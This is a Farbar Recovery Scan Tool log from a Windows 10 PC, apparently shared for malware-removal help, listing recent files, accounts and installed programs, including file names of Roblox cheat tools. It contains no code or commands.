2020-04-15 16:45 - 2020-04-15 16:45 - 000017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wksprtPS.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000017920 _____ (Microsoft Corporation) C:\Windows\system32\icsunattend.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000015872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Custom.ps.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\pcaevts.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\pacjsworker.exe
2020-04-15 16:45 - 2020-04-15 16:45 - 000011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\DMAlertListener.ProxyStub.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\msimg32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DMAlertListener.ProxyStub.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msimg32.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000003072 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000002560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth9.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth8.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth7.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth6.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth5.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth4.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth3.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth2.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth12.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth11.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth10.bin
2020-04-15 16:45 - 2020-04-15 16:45 - 000000315 _____ C:\Windows\system32\DrtmAuth1.bin
2020-04-15 16:40 - 2020-03-16 23:57 - 000390656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\poqexec.exe
2020-04-15 16:40 - 2020-03-16 23:56 - 000492544 _____ (Microsoft Corporation) C:\Windows\system32\poqexec.exe
2020-04-15 14:53 - 2020-04-15 14:53 - 000000754 _____ C:\Users\ntbea\Downloads\Documents - Shortcut.lnk
2020-04-14 21:50 - 2020-04-14 21:50 - 000000098 _____ C:\Users\ntbea\Downloads\RobloxServerCrasher - Linkvertise.txt
2020-04-14 21:09 - 2020-04-20 18:46 - 000000000 ____D C:\Users\ntbea\Desktop\Files
2020-04-14 20:48 - 2020-04-14 20:48 - 000000000 ____D C:\.android
2020-04-14 20:46 - 2020-04-22 10:26 - 000000000 ____D C:\Program Files (x86)\Bonjour
2020-04-14 20:46 - 2020-04-14 20:46 - 000000000 ____D C:\Program Files\Bonjour
2020-04-14 20:16 - 2020-04-14 20:16 - 000000091 _____ C:\Users\ntbea\Desktop\Server Crash Script.txt
2020-04-14 20:10 - 2020-04-22 10:26 - 000000000 ____D C:\Program Files (x86)\LonelyScreen
2020-04-14 20:10 - 2020-04-14 20:10 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LonelyScreen
2020-04-14 14:36 - 2020-04-14 14:36 - 000000000 ___HD C:\$Windows.~WS
2020-04-14 12:47 - 2020-04-14 12:47 - 000000000 ____D C:\Users\ntbea\VirtualBox VMs
2020-04-14 12:46 - 2020-04-14 15:15 - 000000000 ____D C:\Users\ntbea\.VirtualBox
2020-04-14 12:46 - 2020-04-14 12:46 - 000000000 ____D C:\ProgramData\VirtualBox
2020-04-10 22:40 - 2020-04-10 22:40 - 000000063 _____ C:\Users\ntbea\Downloads\Roblox Egg Hunt 2020 - Linkvertise.txt
2020-04-07 12:59 - 2020-04-07 12:59 - 000014581 _____ C:\Users\ntbea\Downloads\Sizzling Sim Auto-Farm - Linkvertise.txt
2020-04-05 16:38 - 2020-04-05 16:38 - 000330752 _____ (Pavel Torgashov) C:\Users\ntbea\Downloads\FastColoredTextBox.dll
2020-04-05 16:37 - 2020-04-05 14:31 - 000056320 _____ () C:\Users\ntbea\Downloads\FlatUI.dll
2020-04-04 15:14 - 2020-04-22 14:41 - 000000000 ____D C:\Users\ntbea\Desktop\Synapse-X
2020-04-02 23:29 - 2020-04-02 23:29 - 000000000 ____D C:\ProgramData\A-Volute
2020-04-02 23:26 - 2020-04-02 23:26 - 000000000 ____D C:\Windows\system32\A-Volute
2020-04-01 12:08 - 2020-04-01 12:08 - 000000000 ____D C:\Users\ntbea\.idlerc
2020-04-01 10:00 - 2020-04-01 10:00 - 000000000 ____D C:\Users\ntbea\AppData\Local\pip
2020-04-01 09:56 - 2020-04-16 12:44 - 000000000 ____D C:\Users\ntbea\AppData\Local\Package Cache
2020-03-28 17:17 - 2020-03-28 17:17 - 000003304 _____ C:\Windows\system32\Tasks\StartCNBM
2020-03-28 17:17 - 2020-03-28 17:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Radeon Software
2020-03-28 17:16 - 2020-03-28 17:16 - 000000000 ____D C:\Program Files (x86)\AMD
2020-03-28 17:14 - 2020-03-18 15:16 - 062867880 _____ C:\Windows\system32\amd_comgr.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 052403624 _____ C:\Windows\SysWOW64\amd_comgr32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 004585920 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\amfrt64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 001784744 _____ C:\Windows\system32\vulkaninfo-1-999-0-0-0.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 001784744 _____ C:\Windows\system32\vulkaninfo.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 001375144 _____ C:\Windows\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 001375144 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 001243560 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\atiadlxy.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 001243560 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\atiadlxx.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 001086184 _____ C:\Windows\system32\vulkan-1-999-0-0-0.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 001086184 _____ C:\Windows\system32\vulkan-1.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000945032 _____ C:\Windows\SysWOW64\vulkan-1-999-0-0-0.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000945032 _____ C:\Windows\SysWOW64\vulkan-1.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000761256 _____ (AMD) C:\Windows\system32\atieclxx.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 000574888 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\Rapidfire64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000493992 _____ C:\Windows\system32\dgtrayicon.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 000491944 _____ C:\Windows\system32\GameManager64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000485800 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\Rapidfire.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000469416 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\atidemgy.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000452008 _____ C:\Windows\system32\atieah64.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 000428992 _____ C:\Windows\system32\EEURestart.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 000346024 _____ C:\Windows\SysWOW64\atieah32.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 000345000 _____ C:\Windows\system32\clinfo.exe
2020-03-28 17:14 - 2020-03-18 15:16 - 000242088 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atig6txx.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000209320 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atigktxx.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000184744 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\mantle64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000179080 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\aticfx64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000163240 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\mantleaxl64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000159680 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atisamu64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000158432 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\aticfx32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000153512 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\mantle32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000138664 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\mantleaxl32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000136616 _____ (AMD) C:\Windows\system32\atimuixx.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000136616 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atisamu32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000135592 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000124840 _____ C:\Windows\system32\atidxx64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000121768 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000121256 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdxc64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000107432 _____ C:\Windows\SysWOW64\atidxx32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000106408 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdxc32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000091560 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\mcl64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000076200 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\mcl32.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000071104 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\ati2erec.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000047528 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\RapidFireServer64.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000044456 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\RapidFireServer.dll
2020-03-28 17:14 - 2020-03-18 15:16 - 000020608 _____ (Microsoft Corporation) C:\Windows\system32\detoured.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 078651304 _____ (Advanced Micro Devices Inc.) C:\Windows\system32\amdhip64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 001686840 _____ (AMD) C:\Windows\system32\amf-mft-mjpeg-decoder64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 001366192 _____ (AMD) C:\Windows\SysWOW64\amf-mft-mjpeg-decoder32.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000941992 _____ (Advanced Micro Devices, Inc.) C:\Windows\system32\amdlvr64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000769448 _____ (Advanced Micro Devices, Inc.) C:\Windows\SysWOW64\amdlvr32.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000554408 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdmcl64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000546568 _____ C:\Windows\system32\amdmiracast.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000484776 _____ C:\Windows\system32\amdgfxinfo64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000467368 _____ C:\Windows\system32\amdlogum.exe
2020-03-28 17:14 - 2020-03-18 15:15 - 000384424 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdmcl32.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000374184 _____ C:\Windows\SysWOW64\amdgfxinfo32.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000135160 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdave64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000128976 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\atimpc64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000128952 _____ (Advanced Micro Devices, Inc. ) C:\Windows\system32\amdpcom64.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000120064 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdave32.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000108056 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\amdpcom32.dll
2020-03-28 17:14 - 2020-03-18 15:15 - 000108048 _____ (Advanced Micro Devices, Inc. ) C:\Windows\SysWOW64\atimpc32.dll
2020-03-28 17:14 - 2020-03-17 17:03 - 003471376 _____ C:\Windows\SysWOW64\atiumdva.cap
2020-03-28 17:14 - 2020-03-17 17:03 - 003437632 _____ C:\Windows\system32\atiumd6a.cap
2020-03-28 17:14 - 2020-03-17 16:59 - 000543136 _____ C:\Windows\SysWOW64\atiapfxx.blb
2020-03-28 17:14 - 2020-03-17 16:59 - 000543136 _____ C:\Windows\system32\atiapfxx.blb
2020-03-25 23:02 - 2020-04-14 14:58 - 000000000 ____D C:\ESD
2020-03-25 16:37 - 2020-03-25 16:37 - 000000000 ____D C:\Program Files (x86)\NuGet
2020-03-25 14:12 - 2020-03-25 14:13 - 001229644 _____ C:\Windows\Minidump\032520-10843-01.dmp

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-04-23 10:08 - 2019-03-19 00:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-04-23 09:29 - 2019-08-27 13:34 - 000840852 _____ C:\Windows\system32\PerfStringBackup.INI
2020-04-23 09:29 - 2019-03-19 00:50 - 000000000 ____D C:\Windows\INF
2020-04-23 09:25 - 2019-12-25 13:44 - 000003126 _____ C:\Windows\system32\Tasks\AMDInstallLauncher
2020-04-23 09:25 - 2019-12-25 13:38 - 000003112 _____ C:\Windows\system32\Tasks\AMDLinkUpdate
2020-04-23 09:25 - 2019-08-27 13:34 - 000000000 ____D C:\ProgramData\NVIDIA
2020-04-23 09:25 - 2019-08-27 13:28 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-04-23 09:24 - 2019-12-25 13:12 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2020-04-23 09:24 - 2019-03-19 00:37 - 000524288 _____ C:\Windows\system32\config\BBI
2020-04-23 09:13 - 2019-08-27 13:36 - 000000000 ____D C:\Users\ntbea\AppData\Local\Packages
2020-04-23 08:54 - 2020-02-26 00:11 - 000000000 ____D C:\Users\ntbea\AppData\Local\Discord
2020-04-23 08:53 - 2020-02-26 00:12 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\Discord
2020-04-23 08:45 - 2019-08-27 20:21 - 000000000 ____D C:\Users\ntbea\AppData\Local\CrashDumps
2020-04-23 08:45 - 2019-03-19 00:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-04-23 08:45 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\AppReadiness
2020-04-23 08:44 - 2019-08-27 13:28 - 000000000 ____D C:\Windows\system32\SleepStudy
2020-04-22 22:48 - 2019-09-04 20:47 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\.minecraft
2020-04-22 22:47 - 2019-10-14 00:08 - 000000000 ____D C:\Program Files (x86)\Minecraft Launcher
2020-04-22 22:43 - 2019-08-26 22:37 - 000000000 ____D C:\Users\ntbea\AppData\Local\PlaceholderTileLogoFolder
2020-04-22 22:23 - 2019-11-05 19:46 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\Visual Studio Setup
2020-04-22 21:57 - 2020-03-02 22:32 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Roblox
2020-04-22 21:57 - 2019-09-08 16:53 - 000000252 _____ C:\Users\ntbea\AppData\LocalLow\rbxcsettings.rbx
2020-04-22 21:42 - 2020-03-12 16:53 - 000000000 ____D C:\Program Files\dotnet
2020-04-22 21:42 - 2019-08-27 13:34 - 000000000 ____D C:\Users\ntbea
2020-04-22 21:38 - 2019-11-05 19:46 - 000000000 ____D C:\Program Files (x86)\Microsoft Visual Studio
2020-04-22 20:43 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\system32\NDF
2020-04-22 14:48 - 2019-08-27 01:44 - 000000000 ____D C:\Program Files\Microsoft Office
2020-04-22 10:26 - 2020-02-02 00:02 - 000000000 ____D C:\Program Files (x86)\GhostMouse
2020-04-22 10:26 - 2019-09-07 17:56 - 000000000 ____D C:\Program Files (x86)\Photo Gallery
2020-04-22 10:26 - 2019-09-05 23:30 - 000000000 ____D C:\Program Files (x86)\Win32DiskImager
2020-04-22 10:26 - 2019-09-04 21:15 - 000000000 ____D C:\Program Files (x86)\Minecraft
2020-04-22 10:26 - 2019-08-30 16:41 - 000000000 ____D C:\Program Files (x86)\ClownfishVoiceChanger
2020-04-22 09:42 - 2019-08-27 02:03 - 000000000 ____D C:\Users\ntbea\AppData\Local\D3DSCache
2020-04-21 16:57 - 2019-11-05 19:47 - 000000000 ____D C:\Users\ntbea\AppData\Local\.IdentityService
2020-04-21 16:29 - 2020-03-18 09:26 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\SAuth
2020-04-21 14:59 - 2019-08-27 13:28 - 000000000 ____D C:\Windows\system32\Drivers\wd
2020-04-20 21:20 - 2019-08-27 13:29 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\obs-studio
2020-04-20 16:57 - 2020-02-04 20:45 - 000002301 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-04-20 16:57 - 2020-02-04 20:45 - 000002260 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-04-20 16:57 - 2020-02-04 20:45 - 000002260 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-04-20 11:08 - 2020-02-04 20:26 - 000000000 ____D C:\Users\ntbea\AppData\Local\SquirrelTemp
2020-04-20 11:05 - 2020-03-20 20:58 - 000000000 ____D C:\Program Files (x86)\Steam
2020-04-20 11:05 - 2020-01-28 18:17 - 000000000 ____D C:\Users\ntbea\AppData\Local\Badlion Client
2020-04-20 10:54 - 2019-03-19 00:52 - 000000000 ____D C:\Program Files\Common Files\microsoft shared
2020-04-19 14:21 - 2019-08-27 13:36 - 000000000 ____D C:\Users\ntbea\AppData\Local\ConnectedDevicesPlatform
2020-04-18 08:18 - 2019-08-30 23:19 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2020-04-17 17:16 - 2019-09-04 21:17 - 000114344 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2020-04-17 17:16 - 2019-09-04 21:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-04-17 17:16 - 2019-09-04 21:17 - 000000000 ____D C:\Program Files (x86)\Java
2020-04-17 17:06 - 2019-08-27 13:28 - 000300528 _____ C:\Windows\system32\FNTCACHE.DAT
2020-04-17 17:04 - 2019-10-26 15:33 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\SystemResources
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\system32\PerceptionSimulation
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\system32\migwiz
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\ShellExperiences
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\Provisioning
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\PolicyDefinitions
2020-04-17 17:04 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\bcastdvr
2020-04-16 21:40 - 2020-01-28 18:14 - 000000000 ____D C:\Users\ntbea\AppData\Roaming\Badlion Client
2020-04-16 21:33 - 2020-01-28 18:14 - 000000000 ____D C:\Program Files\Badlion Client
2020-04-15 22:03 - 2019-08-30 16:42 - 000000639 _____ C:\Users\ntbea\Documents\ClownfishVoiceChanger.ini
2020-04-15 16:48 - 2019-03-19 00:37 - 000000000 ____D C:\Windows\CbsTemp
2020-04-15 13:22 - 2019-08-27 13:34 - 000002363 _____ C:\Users\ntbea\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-04-15 13:22 - 2019-08-26 22:36 - 000000000 ___RD C:\Users\ntbea\OneDrive
2020-04-14 21:08 - 2019-08-27 14:04 - 000000000 ____D C:\Users\ntbea\Desktop\video files
2020-04-14 20:10 - 2019-11-17 20:43 - 000000000 ____D C:\ProgramData\Apple
2020-04-14 14:58 - 2019-08-27 14:28 - 000000000 ____D C:\Windows\Panther
2020-04-07 14:30 - 2020-03-02 22:32 - 000000000 ____D C:\Users\ntbea\AppData\Local\Roblox
2020-04-03 15:27 - 2019-03-19 00:52 - 000000000 ____D C:\Windows\LiveKernelReports
2020-04-02 15:54 - 2020-01-27 20:30 - 000744808 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2020-04-01 15:44 - 2020-03-06 22:02 - 000000141 _____ C:\Users\ntbea\AppData\Roaming\jjv5conf.json
2020-04-01 09:45 - 2019-08-27 02:03 - 000000000 ____D C:\ProgramData\Package Cache
2020-03-28 17:17 - 2019-08-27 17:12 - 000000000 ____D C:\Program Files\AMD
2020-03-28 17:14 - 2019-12-25 13:34 - 000000000 ____D C:\AMD
2020-03-25 16:37 - 2020-03-12 16:54 - 000000000 ____D C:\Program Files (x86)\Windows Kits
2020-03-25 16:37 - 2020-03-12 16:54 - 000000000 ____D C:\Program Files (x86)\Microsoft SDKs
2020-03-25 14:12 - 2020-02-17 00:30 - 2039947304 _____ C:\Windows\MEMORY.DMP
2020-03-25 14:12 - 2019-08-27 13:30 - 000000000 ____D C:\Windows\minidump
==================== Files in the root of some directories ========
2020-03-06 22:02 - 2020-04-01 15:44 - 000000141 _____ () C:\Users\ntbea\AppData\Roaming\jjv5conf.json
2019-10-06 16:47 - 2019-10-06 16:47 - 001065984 _____ () C:\Users\ntbea\AppData\Local\file__0.localstorage
2019-09-05 20:00 - 2019-09-06 20:47 - 000000128 _____ () C:\Users\ntbea\AppData\Local\PUTTY.RND
2020-03-02 20:05 - 2020-03-02 20:05 - 000007605 _____ () C:\Users\ntbea\AppData\Local\Resmon.ResmonCfg
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Addition.txt:
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 22-04-2020
Ran by ntbea (23-04-2020 10:15:33)
Running from C:\Users\ntbea\Downloads
Windows 10 Pro Version 1909 18363.778 (X64) (2019-08-27 17:30:36)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-230749707-3925018352-439227168-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-230749707-3925018352-439227168-503 - Limited - Disabled)
Guest (S-1-5-21-230749707-3925018352-439227168-501 - Limited - Disabled)
ntbea (S-1-5-21-230749707-3925018352-439227168-1001 - Administrator - Enabled) => C:\Users\ntbea
WDAGUtilityAccount (S-1-5-21-230749707-3925018352-439227168-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
AMD Ryzen Master SDK (HKLM\...\{DBD50508-5F75-416B-995D-C42433A00944}) (Version: 2.0.0.1183 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 20.3.1 - Advanced Micro Devices, Inc.)
Application Verifier x64 External Package (HKLM\...\{10CA1677-8F02-3131-F25C-780BAB52E468}) (Version: 10.1.18362.1 - Microsoft) Hidden
Badlion Client 2.13.1 (HKLM\...\{1de14785-dd8c-5cd2-aae8-d4a376f81d78}) (Version: 2.13.1 - Badlion)
Beatz Executor 1.0 (HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\c0697f806bbfcbaa) (Version: 1.0.0.0 - Beatz Executor 1.0)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Branding64 (HKLM\...\{856DA29A-EA4A-468B-BBC2-B5F60DD75BFE}) (Version: 1.00.0002 - Advanced Micro Devices, Inc.) Hidden
ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{0243F145-076D-423A-8F77-218DC8840261}) (Version: 4.8.04119 - Microsoft Corporation) Hidden
DiagnosticsHub_CollectionService (HKLM\...\{1F3C3AAC-9F7A-47DA-A082-0ACE770041BE}) (Version: 16.1.28901 - Microsoft Corporation) Hidden
Dragon Center (HKLM-x32\...\{B252FABF-9582-4824-B02B-6D2DC93685C7}}_is1) (Version: 1.0.0.56 - MSI)
ENE IO Driver (HKLM-x32\...\{D0512FFD-6194-4D2E-967E-25B82A3322FF}) (Version: 2.0.8 - ENE TECHNOLOGY INC.) Hidden
ENE RGB HAL (HKLM\...\{87316426-A33E-41E9-942B-968E928A9A47}) (Version: 1.00.10 - Ene Tech.) Hidden
ENE_EHD_HAL (HKLM\...\{F56EC5A0-3A93-492E-882A-E036F5897CC7}) (Version: 1.00.04 - ENE TECHNOLOGY INC.) Hidden
Entity Framework 6.2.0 Tools  for Visual Studio 2019 (HKLM-x32\...\{7C2070BF-8E07-4B5F-A182-FADB0B95AB39}) (Version: 6.2.0.0 - Microsoft Corporation) Hidden
Epic Games Launcher (HKLM-x32\...\{1D4EB18B-0FEE-444E-B4D1-6F2CFBC363E6}) (Version: 1.1.267.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 81.0.4044.113 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
icecap_collection_neutral (HKLM-x32\...\{929EAD9A-42D2-4FC7-B7E6-529AAD5F6D0D}) (Version: 16.5.29814 - Microsoft Corporation) Hidden
icecap_collection_x64 (HKLM\...\{84EC5964-D540-4494-9043-BF7BEE37D1E1}) (Version: 16.5.29814 - Microsoft Corporation) Hidden
icecap_collectionresources (HKLM-x32\...\{16D7574C-1007-4A85-93FF-666E74AD60D2}) (Version: 16.5.29521 - Microsoft Corporation) Hidden
icecap_collectionresourcesx64 (HKLM-x32\...\{F5C67FC5-BF18-4304-9268-A971876B245A}) (Version: 16.4.29411 - Microsoft Corporation) Hidden
IntelliTraceProfilerProxy (HKLM-x32\...\{7D94CF67-6666-4111-B027-D7AB7F189F70}) (Version: 15.0.18198.01 - Microsoft Corporation) Hidden
Java 8 Update 251 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180251F0}) (Version: 8.0.2510.8 - Oracle Corporation)
Kits Configuration Installer (HKLM-x32\...\{63AAA877-5536-9481-2385-28A082100D78}) (Version: 10.1.18362.1 - Microsoft) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Malwarebytes version 4.1.0.56 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.1.0.56 - Malwarebytes)
Microsoft .NET Core SDK 3.1.201 (x64) from Visual Studio (HKLM\...\{AE0BA5F1-D63A-4784-944F-114B82FB8202}) (Version: 3.1.201.015034 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-230749707-3925018352-439227168-1001\...\OneDriveSetup.exe) (Version: 19.232.1124.0012 - Microsoft Corporation)
